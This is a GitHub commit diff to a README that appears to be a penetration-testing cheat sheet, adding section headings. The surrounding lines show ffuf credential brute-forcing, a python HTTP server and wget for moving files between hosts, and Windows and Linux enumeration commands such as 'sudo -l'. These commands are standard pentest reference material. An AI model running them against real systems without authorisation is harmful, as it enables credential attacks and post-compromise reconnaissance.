Update README.md

This commit is contained in:
Joe Totes
2022-08-04 07:25:42 -04:00
committed by GitHub
parent eb2b4b953b
commit 54706754e7

View File

@@ -335,6 +335,7 @@ dummy, crypt
<br /> <br />
```bash ```bash
# FFUF
# About: A tool used to brute force web credentials # About: A tool used to brute force web credentials
# Download: Pre-installed on Kali Linux # Download: Pre-installed on Kali Linux
@@ -358,6 +359,7 @@ username=admin$password=FUZZ
<br /> <br />
```bash ```bash
# Python Server
# About: A python command used to open a server on the client machine # About: A python command used to open a server on the client machine
# Download: Pre-installed on Kali Linux # Download: Pre-installed on Kali Linux
@@ -373,6 +375,7 @@ sudo python3 -m http.server {PORT}
<br /> <br />
```bash ```bash
# WGET
# About: A command used to download files on the current machine # About: A command used to download files on the current machine
# Download: Pre-installed on Kali Linux # Download: Pre-installed on Kali Linux
@@ -397,7 +400,7 @@ wget http://{IP ADDRESS}/{FILE} -outfile {FILE}
<br /> <br />
```bash ```bash
# Enumeration # Windows Enumeration Commands
# CMD # CMD
net users %username% #Me net users %username% #Me
@@ -425,6 +428,7 @@ Get-LocalGroupMember Administrators | ft Name, PrincipalSource
<br /> <br />
```bash ```bash
# Linux Enumeration Commands
#Check commands you can execute with sudo #Check commands you can execute with sudo
sudo -l sudo -l